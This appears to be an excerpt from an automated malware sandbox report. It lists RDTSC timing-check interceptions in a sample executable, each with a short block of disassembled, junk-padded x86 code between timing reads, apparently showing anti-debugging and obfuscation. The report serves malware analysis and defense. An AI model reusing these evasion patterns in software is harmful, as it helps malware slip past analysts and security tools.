Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFD07F second address: FFD0D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007FBCC4EB33A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007FBCC4EB33B1h 0x00000014 pop edx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 jl 00007FBCC4EB33B1h 0x0000001e jmp 00007FBCC4EB33ABh 0x00000023 jmp 00007FBCC4EB33B9h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFD0D1 second address: FFD0E2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBCC4DE8CC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFB937 second address: FFB952 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBCC4EB33B2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFB952 second address: FFB964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCC4DE8CCCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFBB04 second address: FFBB23 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBCC4EB33B2h 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jno 00007FBCC4EB33A6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFBB23 second address: FFBB29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFBB29 second address: FFBB3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007FBCC4EB33A6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFBB3A second address: FFBB3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFBB3E second address: FFBB46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFBB46 second address: FFBB56 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBCC4DE8CD2h 0x00000008 jp 00007FBCC4DE8CC6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFBDE1 second address: FFBDE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFBDE5 second address: FFBE2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CD7h 0x00000007 jmp 00007FBCC4DE8CD7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FBCC4DE8CCFh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFBE2B second address: FFBE5E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBCC4EB33A6h 0x00000008 jmp 00007FBCC4EB33B7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 jl 00007FBCC4EB33A6h 0x00000018 pushad 0x00000019 popad 0x0000001a jno 00007FBCC4EB33A6h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFC45E second address: FFC462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFC462 second address: FFC478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FBCC4EB33B0h 0x0000000c jmp 00007FBCC4EB33AAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFC478 second address: FFC47D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1001475 second address: 1001484 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33ABh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1001484 second address: 1001492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FBCC4DE8CCCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1001492 second address: 100149A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 100149A second address: 100149E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1001183 second address: 100118E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBCC4EB33A6h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1005695 second address: 100569A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 103EC92 second address: 103EC98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 103EC98 second address: 103EC9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 103EC9C second address: 103ECA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 103ECA0 second address: 103ECA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 104783D second address: 1047841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 10476CD second address: 10476D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1054B31 second address: 1054B5B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBCC4EB33A6h 0x00000008 jmp 00007FBCC4EB33B1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 ja 00007FBCC4EB33CCh 0x00000016 ja 00007FBCC4EB33C2h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 11199E5 second address: 11199EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 11199EA second address: 1119A09 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBCC4EB33AEh 0x00000008 push ebx 0x00000009 jmp 00007FBCC4EB33ACh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111888B second address: 111888F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111888F second address: 11188B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FBCC4EB33B7h 0x0000000c jnl 00007FBCC4EB33A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 11188B5 second address: 11188EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBCC4DE8CD0h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007FBCC4DE8CD9h 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1118BC0 second address: 1118BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1118BC6 second address: 1118BCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1118EC2 second address: 1118EF6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBCC4EB33C0h 0x00000008 jnl 00007FBCC4EB33A6h 0x0000000e jmp 00007FBCC4EB33B4h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jns 00007FBCC4EB33BCh 0x0000001b push eax 0x0000001c push edx 0x0000001d jno 00007FBCC4EB33A6h 0x00000023 push edx 0x00000024 pop edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1118EF6 second address: 1118EFC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 11192D2 second address: 11192DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 11192DA second address: 11192DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 11192DE second address: 1119311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jp 00007FBCC4EB33A6h 0x0000000f push edx 0x00000010 pop edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jmp 00007FBCC4EB33B0h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c jnp 00007FBCC4EB33A8h 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 push edx 0x00000027 pop edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1119311 second address: 1119315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111949C second address: 11194A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 11194A0 second address: 11194B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 11194B5 second address: 11194BA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 11194BA second address: 11194C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FBCC4DE8CC6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 11194C7 second address: 11194CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1119635 second address: 111964D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCC4DE8CCDh 0x00000009 popad 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111C7DB second address: 111C7E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111C7E1 second address: 111C7E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111C7E7 second address: 111C7EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F268 second address: 111F26C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F26C second address: 111F272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F272 second address: 111F278 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F278 second address: 111F287 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F287 second address: 111F28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F28B second address: 111F29A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F29A second address: 111F2A4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBCC4DE8CCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F300 second address: 111F304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F304 second address: 111F30E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBCC4DE8CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F30E second address: 111F318 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FBCC4EB33A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F318 second address: 111F31C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F5F2 second address: 111F5F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F5F9 second address: 111F61F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FBCC4DE8CC6h 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push esi 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop esi 0x00000015 push ecx 0x00000016 ja 00007FBCC4DE8CC6h 0x0000001c pop ecx 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 pushad 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F61F second address: 111F628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F628 second address: 111F62C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F8AD second address: 111F910 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FBCC4EB33A8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 stc 0x00000025 push dword ptr [ebp+122D1B60h] 0x0000002b add edx, 27D1B4B7h 0x00000031 call 00007FBCC4EB33A9h 0x00000036 jl 00007FBCC4EB33B8h 0x0000003c pushad 0x0000003d push eax 0x0000003e pop eax 0x0000003f jmp 00007FBCC4EB33AEh 0x00000044 popad 0x00000045 push eax 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 jnl 00007FBCC4EB33A6h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F910 second address: 111F91A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F91A second address: 111F950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FBCC4EB33ADh 0x00000013 mov eax, dword ptr [eax] 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F950 second address: 111F954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F954 second address: 111F98F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBCC4EB33B9h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111F98F second address: 111F994 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1120D05 second address: 1120D09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1120D09 second address: 1120D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FBCC4DE8CC8h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1120D1D second address: 1120D35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1120D35 second address: 1120D4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CCFh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1120D4A second address: 1120D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1122B84 second address: 1122BA0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jng 00007FBCC4DE8CC6h 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007FBCC4DE8CC6h 0x00000016 ja 00007FBCC4DE8CC6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 11226DC second address: 11226E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 11247DF second address: 11247EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FBCC4DE8CC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A006D second address: 70A0073 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0073 second address: 70A0079 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0079 second address: 70A007D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A007D second address: 70A008B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A008B second address: 70A00B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FBCC4EB33B4h 0x0000000a sub al, 00000018h 0x0000000d jmp 00007FBCC4EB33ABh 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A00B4 second address: 70A00CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCC4DE8CD4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A00CC second address: 70A00DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A00DB second address: 70A00E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A00E1 second address: 70A0123 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [eax+10h] 0x0000000c jmp 00007FBCC4EB33B6h 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FBCC4EB33B7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0123 second address: 70A0158 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBCC4DE8CD2h 0x00000009 sbb cx, EA98h 0x0000000e jmp 00007FBCC4DE8CCBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov dl, al 0x0000001d mov dx, B812h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0158 second address: 70A015E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
